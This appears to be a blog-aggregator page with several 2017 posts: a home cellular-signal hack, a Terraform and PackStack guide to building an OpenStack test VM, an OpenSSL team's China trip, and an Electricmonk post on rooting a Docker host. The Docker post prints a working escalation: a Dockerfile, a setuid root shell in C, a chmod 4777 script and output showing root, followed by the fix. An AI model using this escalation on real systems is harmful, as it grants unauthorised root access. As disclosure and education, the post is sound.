We have found a solution -- an evil solution. We connect an AT&T "Microcell", which provides home cell phone service through your Internet connection, to an AT&T Mobile Hotspot, which provides an Internet connection through your cell phone service.


Now, you may be laughing at this, because it's a circular connection. It's like trying to make a sailboat go by blowing on the sails, or lifting up a barrel to lighten the load in the boat.

But it actually works.

Since we get some, but not enough, cellular signal, we setup a mast 20 feet high with a directional antenna pointed to the cell tower 7.5 miles to the southwest, connected to a signal amplifier. It's still an imperfect solution, as we are still getting terrain distortions in the signal, but it provides a good enough signal-to-noise ratio to get a solid connection.

We then connect that directional antenna directly to a high-end Mobile Hotspot. This gives us a solid 2mbps connection with a latency under 30milliseconds. This is far lower than the 50mbps you can get right next to a 4G/LTE tower, but it's still pretty good for our purposes.

We then connect the AT&T Microcell to the Mobile Hotspot, via WiFi.

To avoid the circular connection, we lock the frequencies for the Mobile Hotspot to 4G/LTE, and to 3G for the Microcell. This prevents the Mobile Hotspot locking onto the strong 3G signal from the Microcell. It also prevents the two from causing noise to the other.

This works really great. We now get a strong cell signal on our phones even 400 feet from the house through some trees. We can be all over the property, out in the lake, down by the garden, and so on, and have our phones work as normal. It's only AT&T, but that's what the whole family uses.

You might be asking why we didn't just use a normal signal amplifier, like they use on corporate campus. It boosts all the analog frequencies, making any cell phone service works.

We've tried this, and it works a bit, allowing cell phones to work inside the house pretty well. But they don't work outside the house, which is where we spend a lot of time. In addition, while our newer phones work, my sister's iPhone 5 doesn't. We have no idea what's going on. Presumably, we could hire professional installers and stuff to get everything working, but nobody would quote us a price lower than $25,000 to even come look at the property.

Another possible solution is satellite Internet. There are two satellites in orbit that cover the United States with small "spot beams" delivering high-speed service (25mbps downloads). However, the latency is 500milliseconds, which makes it impractical for low-latency applications like phone calls.

While I know a lot about the technology in theory, I find myself hopelessly clueless in practice. I've been playing with SDR ("software defined radio") to try to figure out exactly where to locate and point the directional antenna, but I'm not sure I've come up with anything useful. In casual tests, it seems rotating the antenna from vertical to horizontal increases the signal-to-noise ratio a bit, which seems counter intuitive, and should not happen. So I'm completely lost.

Anyway, I thought I'd write this up as a blogpost, in case anybody has better suggestion. Or, instead of signals, suggestions to get wired connectivity. Properties a half mile away get DSL, I wish I knew who to talk to at the local phone company to pay them money to extend Internet to our property.

Phone works in all this area now

by Robert Graham (noreply@blogger.com) at October 02, 2017 01:13 AM

September 30, 2017

Electricmonk.nl

Root your Docker host in 10 seconds for fun and profit

Disclaimer: There is no actual profit. That was just one of those clickbaity things everybody seems to like so much these days. Also, it's not really fun. Alright, on with the show!

A common practice is to add users that need to run Docker containers on your host to the docker group. For example, an automated build process may need a user on the target system to stop and recreate containers for testing or deployments. What is not obvious right away is that this is basically the same as giving those users root access. You see, the Docker daemon runs as root and when you add users to the docker group, they get full access over the Docker daemon.

So how hard is it to exploit this and become root on the host if you are a member of the docker group? Not very hard at all…

$ id
uid=1000(fboender) gid=1000(fboender) groups=1000(fboender), 999(docker)
$ cd docker2root
$ docker build --rm -t docker2root .
$ docker run -v /tmp/persist:/persist docker2root:latest /bin/sh root.sh
$ /tmp/persist/rootshell
# id
uid=0(root) gid=1000(fboender) groups=1000(fboender),999(docker)
# ls -la /root
total 64
drwx------ 10 root root 4096 aug  1 10:32 .
drwxr-xr-x 25 root root 4096 sep 19 05:51 ..
-rw-------  1 root root  366 aug  3 09:26 .bash_history

So yeah, that took all of 3 seconds. I know I said 10 in the title, but the number 10 has special SEO properties. Remember, this is on the Docker host, not in a container or anything!

How does it work?

When you mount a volume into a container, that volume is mounted as root. By default, processes in a container also run as root. So all you have to do is write a setuid root owned binary to the volume, which will then appear as a setuid root binary on the host in that volume too.

Here's what the Dockerfile looks like:

FROM alpine:3.5
COPY root.sh root.sh
COPY rootshell rootshell

The rootshell file is a binary compiled from the following source code (rootshell.c):

int main()
{
   setuid( 0 );
   system( "/bin/sh" );
   return 0;
}

This isn't strictly needed, but most shells and many other programs refuse to run as a setuid binary.

The root.sh file simply copies the rootshell binary to the volume and sets the setuid bit on it:

#!/bin/sh

cp rootshell /persist/rootshell
chmod 4777 /persist/rootshell

That's it.

Why I don't need to report this

I don't need to report this, because it is a well-known vulnerability. In fact, it's one of the less worrisome ones. There's plenty more including all kinds of privilege escalation vulnerabilities from inside container, etc. As far as I know, it hasn't been fixed in the latest Docker, nor will it be fixed in future versions. This is in line with the modern stance on security in the tech world: "security? What's that?" Docker goes so far as to call them "non-events". Newspeak if I ever heard it.

Some choice bullshit quotes from the Docker frontpage and documentation:

Secure by default: Easily build safer apps, ensure tamper-proof transit of all app components and run apps securely on the industry’s most secure container platform.

LOL, sure.

We want to ensure that Docker Enterprise Edition can be used in a manner that meets the requirements of various security and compliance standards.

Either that same courtesy does not extend to the community edition, security by default is no longer a requirement, or it's a completely false claim.

They do make some casual remarks about not giving access to the docker daemon to untrusted users in the Security section of the documentation:

only trusted users should be allowed to control your Docker daemon

However, they fail to mention that giving a user control of your Docker daemon is basically the same as giving them root access. Given that many companies are doing auto-deployments, and have probably given docker daemon access to a deployment user, your build server is now effectivaly also root on all your build slaves, dev, uat and perhaps even production systems.

Luckily, since Docker’s approach to secure by default through apparmor, seccomp, and dropping capabilities

3 seconds to get root on my host with a default Docker install doesn't look like "secure by default" to me. None of these options were enabled by default when I CURL-installed (!!&(@#!) Docker on my system, nor was I warned that I'd need to secure things manually.

How to fix this

There's a workaround available. It's hidden deep in the documentation and took me while to find. Eventually some StackExchange discussion pointed me to a concept known as UID remapping (subuids). This uses the Linux namespaces capabilities to map the user IDs of users in a container to a different range on the host. For example, if you're uid 1000, and you remap the UID to 20000, then the root user (uid 0) in the container becomes uid 20000, uid 1 becomes uid 20001, etc.

You can read about how to manually (because docker is secure by default, remember) configure that on the Isolate containers with a user namespace documentation page. 

by admin at September 30, 2017 12:39 PM

Joe Topjian

Building OpenStack Environments

Introduction

I work a number of OpenStack-based projects. In order to make sure they work correctly, I need to test them against an OpenStack environment. It's usually not a good idea to test on a production environment since mistakes and bugs can cause damage to production.

So the next best option is to create an OpenStack environment strictly for testing purposes. This blog post will describe how to create such an environment.

Where to Run OpenStack

The first topic of consideration is where to run OpenStack.

VirtualBox

At a minimum, you can install VirtualBox on your workstation and create a virtual machine. This is quick, easy, and free. However, you're limited to the resources of your workstation. For example, if your laptop only has 4GB of memory and two cores, OpenStack is going to run slow.

AWS

Another option is to use AWS. While AWS offers a free tier, it's restricted (I think) to the t2.micro flavor. This flavor only supports 1 vCPU, which is is usually worse than your laptop. Larger instances will cost anywhere from $0.25 to $5.00 (and up!) per hour to run. It can get expensive.

However, AWS offers "spot-instances". These are virtual machines that cost a fraction of normal virtual machines. This is possible because spot instances run on spare, unused capacity in Amazon's cloud. The catch is that your virtual machine could be deleted when a higher paying customer wants to use the space. You certainly don't want to do this for production (well, you can, and that's a fun exercise on its own), but for testing, it's perfect.

With Spot Instances, you can run an m3.xlarge flavor, which consists of 4 vCPUs and 16GB of memory, for $0.05 per hour. An afternoon of work will cost you $0.20. Well worth the cost of 4 vCPUs and 16GB of memory, in my opinion.

Spot Pricing is constantly changing. Make sure you check the current price before you begin working. And make sure you do not leave your virtual machine running indefinitely!

Other Spot Pricing Clouds

Both Google and Azure offer spot instances, however, I have not had time to try them, so I can't comment.

Your Own Cloud

The best resource is your own cloud. Maybe you already have a home lab set up or your place of $work has a cloud you can use. This way, you can have a large amount of resources available to use for free.

Provisioning a Virtual Machine

Once you have your location sorted out, you need to decide how to interact with the cloud to provision a virtual machine.

At a minimum, you can use the standard GUI or console that the cloud provides. This works, but it's a hassle to have to manually go through all settings each time you want to launch a new virtual machine. It's always best to test with a clean environment, so you will be creating and destroying virtual machines a lot. Manually setting up virtual machines will get tedious and is prone to human error. Therefore, it's better to use a tool to automate the process.

Terraform

Terraform is a tool that enables you to declaratively create infrastructure. Think of it like Puppet or Chef, but for virtual machines and virtual networks instead of files and packages.

I highly recommend Terraform for this, though I admit I am biased because I spend a lot of time contributing to the Terraform project.

Deploying to AWS

As a reference example, I'll show how to use Terraform to deploy to AWS. Before you begin, make sure you have a valid AWS account and you have gone through the Terraform intro.

There's some irony about using AWS to deploy OpenStack. However, some readers might not have access to an OpenStack cloud to deploy to. Please don't turn this into a political discussion.

On your workstation, open a terminal and make a directory:

$ pwd
/home/jtopjian
$ mkdir terraform-openstack-test
$ cd terraform-openstack-test

Next, generate an SSH key pair:

$ pwd
/home/jtopjian/terraform-openstack-test
$ mkdir key
$ cd key
$ ssh-keygen -t rsa -N '' -f id_rsa
$ cd ..

Next, create a main.tf file which will house our configuration:

$ pwd
/home/jtopjian/terraform-openstack-test
$ vi main.tf

Start by creating a key pair:

provider "aws" {
  region = "us-west-2"
}

resource "aws_key_pair" "openstack" {
  key_name   = "openstack-key"
  public_key = "${file("key/id_rsa.pub")}"
}

With that in place, run:

$ terraform init
$ terraform apply

Next, create a Security Group. This will allow traffic in and out of the virtual machine. Add the following to main.tf:

  provider "aws" {
    region = "us-west-2"
  }

  resource "aws_key_pair" "openstack" {
    key_name   = "openstack-key"
    public_key = "${file("key/id_rsa.pub")}"
  }

+ resource "aws_security_group" "openstack" {
+   name        = "openstack"
+   description = "Allow all inbound/outbound traffic"
+
+   ingress {
+     from_port   = 0
+     to_port     = 0
+     protocol    = "tcp"
+     cidr_blocks = ["0.0.0.0/0"]
+   }
+
+   ingress {
+     from_port   = 0
+     to_port     = 0
+     protocol    = "udp"
+     cidr_blocks = ["0.0.0.0/0"]
+   }
+
+   ingress {
+     from_port   = 0
+     to_port     = 0
+     protocol    = "icmp"
+     cidr_blocks = ["0.0.0.0/0"]
+   }
+ }

Note: Don't include the +. It's used to highlight what has been added to the configuration.

With that in place, run:

$ terraform plan
$ terraform apply

If you log in to your AWS console through a browser, you can see that the key pair and security group have been added to your account.

You can easily destroy and recreate these resources at-will:

$ terraform plan
$ terraform destroy
$ terraform plan
$ terraform apply
$ terraform show

Finally, create a virtual machine. Add the following to main.tf:

  provider "aws" {
    region = "us-west-2"
  }

  resource "aws_key_pair" "openstack" {
    key_name   = "openstack-key"
    public_key = "${file("key/id_rsa.pub")}"
  }

  resource "aws_security_group" "openstack" {
    name        = "openstack"
    description = "Allow all inbound/outbound traffic"

    ingress {
      from_port   = 0
      to_port     = 0
      protocol    = "tcp"
      cidr_blocks = ["0.0.0.0/0"]
    }

    ingress {
      from_port   = 0
      to_port     = 0
      protocol    = "udp"
      cidr_blocks = ["0.0.0.0/0"]
    }

    ingress {
      from_port   = 0
      to_port     = 0
      protocol    = "icmp"
      cidr_blocks = ["0.0.0.0/0"]
    }

  }

+ resource "aws_spot_instance_request" "openstack" {
+   ami = "ami-0c2aba6c"
+   spot_price = "0.0440"
+   instance_type = "m3.xlarge"
+   wait_for_fulfillment = true
+   spot_type = "one-time"
+   key_name = "${aws_key_pair.openstack.key_name}"
+
+   security_groups = ["default", "${aws_security_group.openstack.name}"]
+
+   root_block_device {
+     volume_size = 40
+     delete_on_termination = true
+   }
+
+   tags {
+     Name = "OpenStack Test Infra"
+   }
+ }
+
+ output "ip" {
+   value = "${aws_spot_instance_request.openstack.public_ip}"
+ }

Above, an aws_sport_instance_request resource was added. This will launch a Spot Instance using the parameters we specified.

It's important to note that the aws_spot_instance_request resource also takes the same parameters as the aws_instance resource.

The ami being used is the latest CentOS 7 AMI published in the us-west-2 region. You can see the list of AMIs here. Make sure you use the correct AMI for the region you're deploying to.

Notice how this resource is referencing the other resources you created (the key pair, and the security group). Additionally, notice how you're specifying a spot_price. This is helpful to limit the amount of money that will be spent on this instance. You can get an accurate price by going to the Spot Request page and clicking on "Pricing History". Again, make sure you are looking at the correct region.

An output was also added to the main.tf file. This will print out the public IP address of the AWS instance when Terraform completes.

Amazon limits the amount of spot instances you can launch at any given time. You might find that if you create, delete, and recreate a spot instance too quickly, Terraform will give you an error. This is Amazon telling you to wait. You can open a support ticket with Amazon/AWS and ask for a larger spot quota to be placed on your account. I asked for the ability to launch 5 spot instances at any given time in the us-west-1 and us-west-2 region. This took around two business days to complete.

With all of this in place, run Terraform:

$ terraform apply

When it has completed, you should see output similar to the following:

Outputs:

ip = 54.71.64.171

You should now be able to SSH to the instance:

$ ssh -i key/id_rsa centos@54.71.64.171

And there you have it! You now have access to a CentOS virtual machine to continue testing OpenStack with.

Installing OpenStack

There are numerous ways to install OpenStack. Given that the purpose of this setup is to create an easy-to-deploy OpenStack environment for testing, let's narrow our choices down to methods that can provide a simple all-in-one setup.

DevStack

DevStack provides an easy way of creating an all-in-one environment for testing. It's mainly used to test the latest OpenStack source code. Because of that, it can buggy. I've found that even when using DevStack to deploy a stable version of OpenStack, there were times when DevStack failed to complete. Given that it takes approximately two hours for DevStack to install, having the installation fail has just wasted two hours of time.

Additionally, DevStack isn't suitable to run on a virtual machine which might reboot. When testing an application that uses OpenStack, it's possible that the application causes the virtual machine to be overloaded and lock up.

So for these reasons, I won't use DevStack here. That's not to say that DevStack isn't a suitable tool – after all, it's used as the core of all OpenStack testing.

PackStack

PackStack is also able to easily install an all-in-one OpenStack environment. Rather than building OpenStack from source, it leverages RDO packages and Puppet.

PackStack is also beneficial because it will install the latest stable release of OpenStack. If you are developing an application that end-users will use, these users will most likely be using an OpenStack cloud based on a stable release.

Installing OpenStack with PackStack

The PackStack home page has all necessary instructions to get a simple environment up and running. Here are all of the steps compressed into a shell script:

#!/bin/bash

systemctl disable firewalld
systemctl stop firewalld
systemctl disable NetworkManager
systemctl stop NetworkManager
systemctl enable network
systemctl start network

yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
yum install -y centos-release-openstack-ocata
yum-config-manager --enable openstack-ocata
yum update -y
yum install -y openstack-packstack
packstack --allinone

OpenStack Pike is available at the time of this writing, however, I have not had a chance to test and verify the instructions work. Therefore, I'll be using Ocata.

Save the file as something like deploy.sh and then run it in your virtual machine:

$ sudo bash deploy.sh

Consider using a tool like tmux or screen after logging into your remote virtual machine. This will ensure the deploy.sh script continues to run, even if your connection to the virtual machine was terminated.

The process will take approximately 30 minutes to complete.

When it's finished, you'll now have a usable all-in-one environment:

$ sudo su
$ cd /root
$ source keystonerc_demo
$ openstack network list
$ openstack image list
$ openstack server create --flavor 1 --image cirros test

Testing with OpenStack

Now that OpenStack is up and running, you can begin testing with it.

Let's say you want to add a new feature to Gophercloud. First, you need to install Go:

$ yum install -y wget
$ wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
$ chmod +x /usr/local/bin/gimme
$ eval "$(/usr/local/bin/gimme 1.8)"
$ export GOPATH=$HOME/go
$ export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

To make those commands permanent, add the following to your .bashrc file:

if [[ -f /usr/local/bin/gimme ]]; then
  eval "$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=$PATH:$GOROOT/bin:$GOPATH/bin
fi

Next, install Gophercloud:

$ go get github.com/gophercloud/gophercloud
$ cd ~/go/src/github.com/gophercloud/gophercloud
$ go get -u ./...

In order to run Gophercloud acceptance tests, you need to have several environment variables set. These are described here.

It would be tedious to set each variable for each test or each time you log in to the virtual machine. Therefore, embed the variables into the /root/keystonerc_demo and /root/keystonerc_admin files:

source /root/keystonerc_admin
nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
_NETWORK_ID=$(openstack network show private -c id -f value)
_SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
_EXTGW_ID=$(openstack network show public -c id -f value)
_IMAGE_ID=$(openstack image show cirros -c id -f value)

echo "" >> /root/keystonerc_admin
echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

echo "" >> /root/keystonerc_demo
echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

Now try to run a test:

$ source ~/keystonerc_demo
$ cd ~/go/src/github.com/gophercloud/gophercloud
$ go test -v -tags "fixtures acceptance" -run "TestServersCreateDestroy" \
  github.com/gophercloud/gophercloud/acceptance/openstack/compute/v2

That go command is long and tedious. A shortcut would be more helpful. Add the following to ~/.bashrc:

gophercloudtest() {
  if [[ -n $1 ]] && [[ -n $2 ]]; then
    pushd  ~/go/src/github.com/gophercloud/gophercloud
    go test -v -tags "fixtures acceptance" -run "$1" github.com/gophercloud/gophercloud/acceptance/openstack/$2 | tee ~/gophercloud.log
    popd
  fi
}

You can now run tests by doing:

$ source ~/.bashrc
$ gophercloudtest TestServersCreateDestroy compute/v2

Automating the Process

There's been a lot of work done since first logging into the virtual machine and it would be a hassle to have to do it all over again. It would be better if the entire process was automated, from start to finish.

First, create a new directory on your workstation:

$ pwd
/home/jtopjian/terraform-openstack-test
$ mkdir files
$ cd files
$ vi deploy.sh

In the deploy.sh script, add the following contents:

#!/bin/bash

systemctl disable firewalld
systemctl stop firewalld
systemctl disable NetworkManager
systemctl stop NetworkManager
systemctl enable network
systemctl start network

yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
yum install -y centos-release-openstack-ocata
yum-config-manager --enable openstack-ocata
yum update -y
yum install -y openstack-packstack
packstack --allinone

source /root/keystonerc_admin
nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
_NETWORK_ID=$(openstack network show private -c id -f value)
_SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
_EXTGW_ID=$(openstack network show public -c id -f value)
_IMAGE_ID=$(openstack image show cirros -c id -f value)

echo "" >> /root/keystonerc_admin
echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

echo "" >> /root/keystonerc_demo
echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

yum install -y wget
wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
chmod +x /usr/local/bin/gimme
eval "$(/usr/local/bin/gimme 1.8)"
export GOPATH=$HOME/go
export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

go get github.com/gophercloud/gophercloud
pushd ~/go/src/github.com/gophercloud/gophercloud
go get -u ./...
popd

cat >> /root/.bashrc <<EOF
if [[ -f /usr/local/bin/gimme ]]; then
  eval "\$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=\$PATH:$GOROOT/bin:\$GOPATH/bin
fi

gophercloudtest() {
  if [[ -n \$1 ]] && [[ -n \$2 ]]; then
    pushd  ~/go/src/github.com/gophercloud/gophercloud
    go test -v -tags "fixtures acceptance" -run "\$1" github.com/gophercloud/gophercloud/acceptance/openstack/\$2 | tee ~/gophercloud.log
    popd
  fi
}
EOF

Next, add the following to main.tf:

  provider "aws" {
    region = "us-west-2"
  }

  resource "aws_key_pair" "openstack" {
    key_name   = "openstack-key"
    public_key = "${file("key/id_rsa.pub")}"
  }

  resource "aws_security_group" "openstack" {
    name        = "openstack"
    description = "Allow all inbound/outbound traffic"

    ingress {
      from_port   = 0
      to_port     = 0
      protocol    = "tcp"
      cidr_blocks = ["0.0.0.0/0"]
    }

    ingress {
      from_port   = 0
      to_port     = 0
      protocol    = "udp"
      cidr_blocks = ["0.0.0.0/0"]
    }

    ingress {
      from_port   = 0
      to_port     = 0
      protocol    = "icmp"
      cidr_blocks = ["0.0.0.0/0"]
    }

  }

  resource "aws_spot_instance_request" "openstack" {
    ami = "ami-0c2aba6c"
    spot_price = "0.0440"
    instance_type = "m3.xlarge"
    wait_for_fulfillment = true
    spot_type = "one-time"
    key_name = "${aws_key_pair.openstack.key_name}"

    security_groups = ["default", "${aws_security_group.openstack.name}"]

    root_block_device {
      volume_size = 40
      delete_on_termination = true
    }

    tags {
      Name = "OpenStack Test Infra"
    }
  }

+ resource "null_resource" "openstack" {
+  connection {
+    host        = "${aws_spot_instance_request.openstack.public_ip}"
+    user        = "centos"
+    private_key = "${file("key/id_rsa")}"
+  }
+
+  provisioner "file" {
+    source      = "files"
+    destination = "/home/centos/files"
+  }
+
+  provisioner "remote-exec" {
+    inline = [
+      "sudo bash /home/centos/files/deploy.sh"
+    ]
+  }
+ }

  output "ip" {
    value = "${aws_spot_instance_request.openstack.public_ip}"
  }

The above has added a null_resource. null_resource is simply an empty Terraform resource. It's commonly used to store all provisioning steps. In this case, the above null_resource is doing the following:

  1. Configuring the connection to the virtual machine.
  2. Copying the files directory to the virtual machine.
  3. Remotely running the deploy.sh script.

Now when you run Terraform, once the Spot Instance has been created, Terraform will copy the files directory to it and then execute deploy.sh. Terraform will now take approximately 30-40 minutes to finish, but when it has finished, OpenStack will be up and running.

Since a new resource type has been added (null_resource), you will need to run terraform init:

$ pwd
/home/jtopjian/terraform-openstack-test
$ terraform init

Then to run everything from start to finish, do:

$ terraform destroy
$ terraform apply

When Terraform is finished, you will have a fully functional OpenStack environment suitable for testing.

Conclusion

This post detailed how to create an all-in-one OpenStack environment that is suitable for testing applications. Additionally, all configuration was recorded both in Terraform and shell scripts so the environment can be created automatically.

Granted, if you aren't creating a Go-based application, you will need to install other dependencies, but it should be easy to figure out from the example detailed here.

While this setup is a great way to easily build a testing environment, there are still other improvements that can be made. For example, instead of running PackStack each time, an AMI image can be created which already has OpenStack installed. Additionally, multi-node environments can be created for more advanced testing. These methods will be detailed in future posts.

September 30, 2017 06:00 AM

September 28, 2017

OpenSSL

Seven Days and Four Cities in China

We had been invited to spend time with the open source community in China by one of the developers - Paul Yang - who participates in the OpenSSL project. A number of the team members had communicated via email over the last year and when the suggestion was made there were enough of us willing and interested to visit China for a “tour” to make sense. So the tour was agreed as a good thing and that started the journey that lead to spending a week in China (last week as I write this on the plane on the way back to Australia).

What started out as a quick visit to one company rapidly turned into a multi-city, multi-company event - with a mixture of:

  • see “China”
  • visit major companies that use OpenSSL
  • meet with developers who work with or contribute to OpenSSL
  • a half-day presentation session with open source developers at which each member of the OpenSSL team would speak on a different topic.

Our hosts BaishanCloud put an amazing amount of effort into organising the trip - everything was planned for - from the flights, the hotels, who would meet as at the airport and what signs they would hold and what they looked like and their contact details. Nothing was left to chance.

Our arrival day came and into Shanghai flew the five of us (Matt, Richard, Steve, Tim, and finally Rich) spread out over the day and across multiple airlines and terminals. Despite the logistical challenges the BaishanCloud team made the arrival a very smooth process.

We stayed in fantastic hotels, and at each stage we had a designated guide (from the marketing team) that looked after the logistics. For Shanghai and Hangzhou it was Jane, for Shenzhen it was Shirley, and for Beijing it was Alan. We learned rapidly to simply follow their lead as everything had been planned - even the unexpected.

Paul (Yang Yang), Sean, and Jedo from the BaishanCloud engineering group also accompanied us everywhere. It was great to have the company and be able to interact over the whole trip. Their backgrounds were as different as their personalities and their individual sense of humour.
We spent a lot of time together over the week - from early starts (for the engineers) at 7am for breakfast - to late nights discussing the day, plans for the next and getting to know each other (after 10pm) - we simply kept on-the-go all the time.

Woven through the complex schedule were tours of some famous Chinese locations - Lingyin Temple in Hangzhou, Shenzhen Sarafi Park in Shenzhen, Imperial Palace / Forbidden City and Shichahai Lake in Beijing.

Our hosts did not just want us to visit people - they wanted us to experience some part of the wonderfully rich history of the Chinese people - a detailed history that goes back far beyond the recorded history of countries that we all came from.

We had many adventures along the journey but we all experienced a lot of things. As a team, we discussed the various different things from architecture, traffic, cars, culture, working hours, city layout, food, social customs, and the prices of various items. It was amazing for me to see the difference between the team members and their own cultural experiences and viewpoints changing what was seen. Those of us who had travelled and experienced other cultures simply soaked it all in and appreciated the depth and complexity of the uniquely Chinese experiences.

Discussions over dinner about the rich experience made it very clear that we saw different aspects of the experience of this deeply unique culture.

Our Hosts

Our hosts also had their own preconceived notions of what the team would like - would we be able to eat the food - could we use chopsticks (we all can and even those who had only minimal experience with chopsticks used them at every lunch or dinner), - could we eat the food (given how foreign it would be). Some of us are definitely more adventurous than others (sticking to mild food that was more familiar) but most of us eagerly tried the huge range of dishes that our hosts provided. Almost every meal we had to say “stop, no more food” as the dishes kept coming out - and with each new dish we wanted to try it - but the stomach can only fit so much food despite how interesting and tempting the dish was. It was a testament to the range of food experiences that we had that for many of the dishes we ate our engineering hosts had themselves never eaten.

By the end of the week, we all recognised many of the dishes, had definite personal preferences, and all could easily pick up individual grains of rice with chopsticks and eat without making too much of a mess on the table. Still, even at the final traditional Chinese meal together we still were exposed to dishes we hadn’t eaten before and more food then we could possibly eat. There were also concerns about whether or not we would understand their English (not a problem) - and although we had some very funny moments figuring out what some things, there was never moment where we couldn’t figure out how to communicate. Sure there are lots of strange words and phrases we use that added to the fun - but basic communication simply isn’t a problem.

The monkey riding on a chicken

One phrase that does stick in the mind is how our guide (Snow) to the forbidden city explained things in ways she knew we, as foreigners, would remember - pointing to the roof of a building she said “see what looks like a monkey riding on a chicken - that’s an immortal on a phoenix leading the procession of mythical creatures”. We saw that “monkey-riding-on-a-chicken” a lot during our time in the forbidden city. Little things like that helped frame the cultural reference and had us looking for the markers - noticing which buildings were associated with the emperor and which buildings were temples - and how important each of the buildings were relative to each other (counting the mythical creatures became second nature to fitting the importance of each building into context).

There is also a clear distinction in the Chinese people we interacted with between those who are immersed in the traditions and culture and those who are much more focused on the future. We all experience that in our own cultures and it was refreshing to see the full range of viewpoints. Some of our hosts have never before visited or experienced what was being shown to us, and we got to see how they reacted to the experience - and as expected, different things caught their interest and we had many discussions about the experience of the day over dinner each evening.

China Is Simply Not Just The Same As Back Home

We are a team, and like all teams we are made up of individuals who had very different experiences. We are shaped by our experiences and the willingness to be open to new experiences without mapping them back in term of our own cultural context is absolutely critical to getting a rich experience when learning about other cultures.

China is different (as are all cultures), Chinese engineers have different obstacles to overcome to participate in open source projects - obstacles that we as a team should be actively aware of and looking to reduce.

China’s Open Source Leaps

Open source has revolutionised China software engineering - and that open source has allowed a new generation of companies to take an amazing leap forward - with the building blocks freely available anyone with an idea and passion can turn that idea into a business - staffed from a huge pool of engineering talent - and be successful. There are innovations and engineering going on in China that equal or exceed the engineering achievements elsewhere in the world - that was clearly evident in the meetings we had with staff at various companies - from small start-ups through to massively successful major brand names.

Very few companies in the world are pure open source companies - there are unique challenges to making a successful living as an “all-open-source” company. For most companies, it is easy to import or adopt open source, it is much more difficult to contribute back to open source. The same is true in China. Getting the balance right for a company requires education and commitment from both engineering and executives in order to ensure that the benefits are understood along with the appropriate protections being in place so that the company only contributes what it expects to contribute. The concept of contribution back to the open source community is clearly at an earlier stage in China than it is in the counties of the OpenSSL team members.

How to grow this realisation is something we will be discussing further - and this goes wider to the entire open source community and it not something specific to OpenSSL.

Typical Chinese Engineering Work Days

Chinese engineers generally live a long way from the office (1-2 hour or longer journeys are common) and have to come into the office (it is rare to be able to work from home) and stay late in evening. Ending at 9pm is common. And catching up with friends and a social life seems to start around 10pm. Getting a 2am WeChat message is considered normal - nothing at all strange.

